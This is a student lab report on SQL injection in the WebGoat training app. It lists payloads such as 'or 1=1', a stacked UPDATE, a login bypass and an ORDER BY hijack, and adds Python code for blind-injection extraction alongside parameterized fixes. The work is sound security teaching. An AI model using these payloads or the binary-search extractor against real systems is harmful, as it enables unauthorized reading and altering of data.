COMP 357 Advanced Penetration Testing

Lab 3 SQL Injection


Kimberly Anderson
Setup: After installing Java and WebGoat, in the command line I issued java -jar WebGoat-6.0.1-war-exec.jar to start WebGoat (Fig.1). Then in the Internet Explorer browser I typed localhost:8080/WebGoat into the URL bar and logged in using guest/guest (Fig.2).

Fig.1

Fig.2
Injection Flaws
Numeric SQL Injection: In the code for this task, the line SELECT * FROM weather_data WHERE station = 101 is executed; if I change the 101 to 101 or 1=1, the condition evaluates as true for each of the weather stations (Fig.3).

Fig.3

String SQL Injection: Any name or word can be entered in the entry box as long as 1=1 is present, which makes the query true for any name (Fig.4).

Fig.4
Modify Data and Add Data: If the input contains UPDATE salaries SET salary=999999 WHERE userid=jsmith, then no matter which name is entered the argument is true and jsmith's salary is updated to 999999 (Fig.5).

Fig.5
Blind Numeric SQL Injection: By altering the code so that the account number can be any number, every number evaluates as true (Fig.5&6).

Fig.5

Fig.6
Blind String SQL Injection: By changing the text string to compare characters, the argument checks whether the account name falls within certain character lengths and letter combinations (Fig.7&8).
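The two blind lessons above return only "valid" or "invalid", yet that single bit is enough to read data out of the database. The following is an added Python example, not code from this lab report or from WebGoat: it builds an in-memory sqlite3 database with constructed tables (user_data and pins, modelled on the lesson), exposes the account-number check as the yes/no oracle, and recovers a PIN by binary search and a name character by character using SQLite's length(), substr() and unicode() functions. The table and column names and the stored values are assumptions made for the example.

```python
import sqlite3

# Constructed sample data modelled on the WebGoat blind-injection lessons;
# the table layout and values are assumptions for this example.
def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user_data (userid INTEGER, first_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe'), (102, 'John');
        CREATE TABLE pins (cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('1111222233334444', 2364, 'Jill');
    """)
    return conn

def account_exists(conn, account_number):
    # The vulnerable check: the caller only learns True/False, but the
    # account number is still concatenated into the SQL text.
    query = "SELECT count(*) FROM user_data WHERE userid = " + account_number
    return conn.execute(query).fetchone()[0] > 0

def account_exists_fixed(conn, account_number):
    # Bound parameter: "101 AND 1=1" is one value that matches no userid.
    return conn.execute("SELECT count(*) FROM user_data WHERE userid = ?",
                        (account_number,)).fetchone()[0] > 0

def ask(conn, condition):
    # One yes/no question: a known-valid account (101) AND the attacker's condition.
    return account_exists(conn, "101 AND (" + condition + ")")

def binary_search(conn, expr, lo, hi):
    # Finds the value of the SQL expression expr, known to lie in [lo, hi],
    # with about log2(hi - lo) "expr <= mid" questions.
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(conn, expr + " <= " + str(mid)):
            hi = mid
        else:
            lo = mid + 1
    return lo

def extract_pin(conn, cc_number):
    # Blind numeric: the PIN is a 4-digit integer, so search 0..9999.
    expr = "(SELECT pin FROM pins WHERE cc_number = '" + cc_number + "')"
    return binary_search(conn, expr, 0, 9999)

def extract_name(conn, cc_number):
    # Blind string: first learn the length, then each character's code point
    # within printable ASCII (32..126).
    row = "(SELECT name FROM pins WHERE cc_number = '" + cc_number + "')"
    length = binary_search(conn, "length(" + row + ")", 0, 64)
    chars = []
    for i in range(1, length + 1):
        code = binary_search(conn, "unicode(substr(" + row + ", " + str(i) + ", 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)
```

Each call to ask() costs one request to the application, which is what a blind attack looks like in the server logs: a burst of near-identical requests whose only variation is a comparison constant. The binary search keeps that to roughly fourteen requests for a four-digit PIN and seven per character of a name, and the same oracle would also answer questions about any other table the database user can read.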

Fig.7

Fig.8
SQL Injection Stage 1: Using OWASP ZAP, I set a break on the request; then in the WebGoat login field I entered a random string of numbers and selected Login. In the ZAP break window the employee ID, password and action are displayed, where I can make modifications. I changed the password to OR 1=1, which makes any password entered true (Fig.9&10).

Fig.9

Fig.10
SQL Injection Stage 3: By altering the employee ID to read 101 OR 1=1 ORDER BY salary desc, the 1=1 ORDER BY salary desc overrides Larry's ID 101 and displays the employee with the highest salary (Fig.11&12).
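Every lesson in this lab has the same root cause: user input is pasted into the SQL text. The following is an added Python example, not code from this lab report or from WebGoat, that reproduces the Numeric, String, Modify Data, Stage 1 and Stage 3 injections above against an in-memory sqlite3 database and places each vulnerable query next to its parameterized fix. The table names follow the WebGoat lessons (weather_data, user_data, salaries, employee) but the columns and rows are constructed for this example, and stacked statements are modelled with executescript(), since the lesson's backend accepted them while sqlite3's execute() refuses more than one statement.

```python
import sqlite3

# Constructed sample data modelled on the WebGoat lesson tables; the columns
# and rows are assumptions for this example.
def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE weather_data (station INTEGER, name TEXT);
        INSERT INTO weather_data VALUES (101, 'Columbia'), (102, 'Seattle'), (103, 'New York');
        CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe', 'Snow'), (102, 'John', 'Smith');
        CREATE TABLE salaries (userid TEXT, salary INTEGER);
        INSERT INTO salaries VALUES ('jsmith', 45000), ('lsmith', 50000);
        CREATE TABLE employee (userid INTEGER, first_name TEXT, password TEXT, salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry', 'larry', 55000),
                                    (102, 'Moe', 'moe', 140000),
                                    (112, 'Neville', 'neville', 450000);
    """)
    return conn

# --- Numeric SQL Injection ---
def weather_vulnerable(conn, station):
    # The text is spliced into the statement, so "101 or 1=1" becomes part of
    # the WHERE clause and matches every station.
    query = "SELECT station, name FROM weather_data WHERE station = " + station
    return conn.execute(query).fetchall()

def weather_fixed(conn, station):
    # Bound parameter: the whole string is one value, so the injected text
    # matches nothing instead of everything.
    return conn.execute("SELECT station, name FROM weather_data WHERE station = ?",
                        (station,)).fetchall()

# --- String SQL Injection ---
def lookup_vulnerable(conn, last_name):
    query = "SELECT first_name, last_name FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(query).fetchall()

def lookup_fixed(conn, last_name):
    return conn.execute("SELECT first_name, last_name FROM user_data WHERE last_name = ?",
                        (last_name,)).fetchall()

# --- Modify Data: stacked UPDATE ---
def salary_vulnerable(conn, userid):
    # executescript() runs every statement in the string, modelling a backend
    # that accepts stacked queries; the injected UPDATE therefore executes.
    conn.executescript("SELECT salary FROM salaries WHERE userid = '" + userid + "'")
    return conn.execute("SELECT salary FROM salaries WHERE userid = 'jsmith'").fetchone()[0]

def salary_fixed(conn, userid):
    conn.execute("SELECT salary FROM salaries WHERE userid = ?", (userid,))
    return conn.execute("SELECT salary FROM salaries WHERE userid = 'jsmith'").fetchone()[0]

# --- Stage 1: login bypass through the intercepted password field ---
def login_vulnerable(conn, employee_id, password):
    query = ("SELECT userid, first_name FROM employee WHERE userid = " + employee_id
             + " AND password = '" + password + "'")
    return conn.execute(query).fetchone()   # None means the login failed

def login_fixed(conn, employee_id, password):
    return conn.execute("SELECT userid, first_name FROM employee WHERE userid = ? AND password = ?",
                        (employee_id, password)).fetchone()

# --- Stage 3: ORDER BY hijack through the employee ID ---
def view_profile_vulnerable(conn, employee_id):
    # The application shows the first row returned, so an injected
    # "OR 1=1 ORDER BY salary DESC" makes it show the best-paid employee.
    query = "SELECT userid, first_name, salary FROM employee WHERE userid = " + employee_id
    return conn.execute(query).fetchone()

def view_profile_fixed(conn, employee_id):
    return conn.execute("SELECT userid, first_name, salary FROM employee WHERE userid = ?",
                        (employee_id,)).fetchone()
```

With a bound parameter the driver sends the value separately from the statement, so a string such as 101 or 1=1 is compared as a single literal rather than parsed as SQL; in SQLite the text '101' still matches the INTEGER column because numeric affinity converts it, while the injected string cannot be converted and matches no row. The same fix covers the Stage 1 case even though the attacker controls the request body in ZAP rather than the form: client-side controls such as a drop-down for the employee ID are not a defence, because the server never sees the form, only the request.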

Fig.11

Fig.12